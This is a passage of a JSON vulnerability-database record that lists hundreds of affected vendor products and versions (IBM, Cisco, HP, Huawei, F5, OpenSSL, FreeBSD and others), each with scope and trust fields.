"ibm", "version": "2.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip webaccelerator", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9" }, { "model": "documentum content server sp2", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77109.7" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.1" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "quantum policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.2-rc2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "point software check point security gateway r70", "scope": null, "trust": 0.3, "vendor": "check", "version": null }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "telepresence mxp series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.4" }, { "model": "flare experience for ipad", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.2.2" }, { "model": "communicator for ipad", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "srg1200\u00262200\u00263200 v100r002c02spc800", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "infosphere balanced warehouse d5100", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cc v200r001c31", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s12700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.10" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10648" }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.9" }, { "model": "oceanstor s5500t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "security information and event management hf3", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.1.4" }, { "model": "documentum content server sp2 p13", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "icewall sso dfw r2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "messaging secure gateway", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.1" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "s2750\u0026s5700\u0026s6700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "point software check point security gateway r75", "scope": null, "trust": 0.3, "vendor": "check", "version": null }, { "model": "anyconnect secure mobility client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.3" }, { "model": "documentum content server sp2 p14", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "ecns600 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "jabber voice for iphone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.8" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.5" }, { "model": "8.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip edge gateway", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system gx7800", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "operations orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.03" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.2.0.9" }, { "model": "puredata system for operational analytics a1791", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "dsm v100r002c05spc615", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vdi communicator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip edge gateway", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "icewall sso certd r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.5" }, { "model": "paging server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "ace application control engine module ace20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "hyperdp oceanstor n8500 v200r001c09", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "agent desktop for cisco unified contact center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "ape", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "hyperdp v200r001c91spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "unified attendant console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dsr-500 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "s3900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "ace application control engine module ace10", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v110.1" }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "20" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "manageone v100r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463011.5" }, { "model": "arx", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "esight-ewl v300r001c10spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ave2000 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "usg9300 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "anyoffice v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "big-ip wom", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.1" }, { "model": "bbm for android", "scope": "ne", "trust": 0.3, "vendor": "rim", "version": "2.2.1.40" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.0" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.1" }, { "model": "usg9500 usg9500 v300r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2990 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip edge gateway", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "one-x mobile ces for iphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "big-ip webaccelerator", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "oceanstor s6800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "manageone v100r001c02 spc901", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2" }, { "model": "oceanstor s2600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "email and server security", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "11.00" }, { "model": "psb email and server security", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "9.20" }, { "model": "isoc v200r001c02spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ons series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154000" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.2" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webapp secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.1-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "policy center v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "colorqube ps", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "88704.76.0" }, { "model": "updatexpress system packs installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart update manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.4.1" }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0" }, { "model": "big-ip edge gateway", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "watson explorer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.3" }, { "model": "jabber video for ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ctpos 6.6r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "webex connect client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "cognos planning fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "email and server security", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "10.00" }, { "model": "softco v200r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1.2" }, { "model": "agile controller v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "nip2000\u00265000 v100r002c10hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smc2.0 v100r002c01b017sp16", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip wom", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "blackberry link", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "1.2" }, { "model": "one-x mobile ces for android", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "physical access gateways", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89410" }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "isoc v200r001c01spc101", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "watson explorer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "10.0-beta", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "documentum content server p06", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "isoc v200r001c00spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "small business isa500 series integrated security appliances", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.28" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "idp 4.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "usg9500 usg9500 v300r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "uma v200r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip webaccelerator", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "isoc v200r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "big-iq security", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "simatic wincc oa", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "3.12" }, { "model": "eupp v100r001c10spc002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "operations orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "db2 connect application server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.0" }, { "model": "9.1-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "stunnel", "scope": "ne", "trust": 0.3, "vendor": "stunnel", "version": "5.02" }, { "model": "big-iq cloud", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.6" }, { "model": "flex system fc5022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "oceanstor s5500t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "documentum content server p07", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "wag310g wireless-g adsl2+ gateway with voip", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.4" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified wireless ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "29200" }, { "model": "one-x mobile for blackberry", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "ida pro", "scope": "eq", "trust": 0.3, "vendor": "hex ray", "version": "6.5" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.2" }, { "model": "9.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1.5" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.02007" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "smart call home", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0" }, { "model": "big-ip wom", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "firepass", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "7.0" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": 